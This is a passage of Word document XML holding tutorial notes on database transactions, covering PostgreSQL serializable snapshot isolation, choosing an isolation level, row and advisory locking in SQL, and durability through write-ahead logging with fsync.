        <w:t xml:space="preserve">  - Deadlocks possible (T1 holds A, wants B; T2 holds B, wants A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63C80E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFEC6C2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Used by: MySQL InnoDB in SERIALIZABLE mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BDC1C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serializable Snapshot Isolation (SSI) — PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D823FF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9B0FF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Optimistic approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F380BCA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  1. Transactions run using MVCC snapshots (no blocking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04292678" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  2. Database tracks read/write dependencies between concurrent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B57427" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  3. At commit: check if the transaction's reads are still valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135DC9B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">     If another committed transaction wrote to data this transaction read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5CD105" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">       → Potential serialization anomaly detected → ABORT one transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB74D3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  4. Aborted transaction retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D96FD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="00A618F4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Advantage over 2PL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F180AD6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - No blocking (readers and writers proceed without waiting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5864B328" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Only conflicts cause aborts (optimistic — works well when conflicts are rare).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39F972" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Much better throughput than 2PL for read-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23642E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="21C7036B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Disadvantage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADAD704" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Higher abort rate under high contention (wasted work).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877A8AA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Application must handle retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E7778" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 Practical Isolation Level Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A1E25" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB34C55" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Read Committed (default for most):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B841905" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use when: Most OLTP applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C09AE0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Acceptable: reading slightly different data between statements in a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390256D9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Not acceptable: financial calculations that span multiple reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA83A6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="59292F5A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Repeatable Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A6471" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use when: Reporting queries that need a consistent view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC073C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use when: Transactions that read data and then write based on what they read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E6DE0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Prevents: lost updates, non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A057E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="40316174" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Serializable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41747F33" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use when: Financial transactions, inventory management, any critical invariant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D409C1F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Use when: You cannot reason about all possible interleavings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B22DE0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Cost: higher abort rate, lower throughput under contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896B155" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DE43E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Rule of thumb: Start with Read Committed. Use Serializable for critical operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9FA9C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  (transfers, bookings, inventory). Use application-level locking (SELECT FOR UPDATE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A01593" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  for specific race conditions without full serializable overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30689F9D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.7 Explicit Locking (Application Control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C02393" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E219A91" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- SELECT FOR UPDATE: Acquire exclusive lock on selected rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A337030" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263AE2B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT balance FROM accounts WHERE id = 'Alice' FOR UPDATE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D5B1A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Row is now LOCKED. No other transaction can read (FOR UPDATE) or modify it until we commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C9FC2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>UPDATE accounts SET balance = balance - 100 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC98882" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70868B16" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="7492BD1B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- SELECT FOR SHARE: Acquire shared lock (prevent writes, allow other reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6DA73A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT * FROM products WHERE id = 42 FOR SHARE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B51DA2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="203EA738" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Advisory locks (application-level, not tied to rows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1E13E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT pg_advisory_lock(42);  -- Lock on arbitrary ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434ACF74" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- ... do work ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28057D5E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT pg_advisory_unlock(42);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A74C06" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="2E1C69F5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- SKIP LOCKED (queue-like processing — don't wait for locked rows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319A583" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>SELECT * FROM tasks WHERE status = 'pending' LIMIT 1 FOR UPDATE SKIP LOCKED;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF4D55" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>-- Returns next AVAILABLE (unlocked) row. Other workers process different rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C769F4D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="09EAF49F">
          <v:rect id="_x0000_i6698" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA3C9D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Durability — Committed Data Survives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284459A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376EF472" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Once a transaction is committed (client receives confirmation), its changes are permanent and will survive any subsequent failure — power loss, OS crash, hardware failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4888A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116E8C7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ED018B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1: INSERT INTO orders ... COMMIT; → Server responds "OK, committed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6116E1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1: Server immediately loses power.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B75FFF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EAA48E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  After restart: The order MUST exist in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7E381" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  The "OK, committed" response was a PROMISE that the data is safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9FB8E2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Breaking this promise = data loss = unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C849AF5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 How Durability Is Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26396F37" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Log (WAL) with fsync:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C4C07" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD611D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>The moment of COMMIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7374B2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  1. WAL record written: "T1 COMMIT" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37509E5E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  2. WAL buffer flushed to DISK (fsync system call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD83D7D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  3. fsync returns → data is on PERSISTENT storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BBA6DF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  4. Client receives "committed" response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD9745" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="34A11F3D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Why WAL (not data pages directly)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243833AA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - WAL writes are SEQUENTIAL (fast — disk handles sequential writes at full speed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22C5B2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Data page writes are RANDOM (slow — random I/O is 100x slower).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006F557" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - WAL is SMALL (just the changes, not full pages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEBC82" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892A004" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Strategy: Write WAL sequentially (fast, durable). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C119CA9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Flush actual data pages in background at leisure (checkpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3C5C1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  On crash: replay WAL to reconstruct any data pages not yet flushed.</w:t>
      </w:r>
    </w:p>
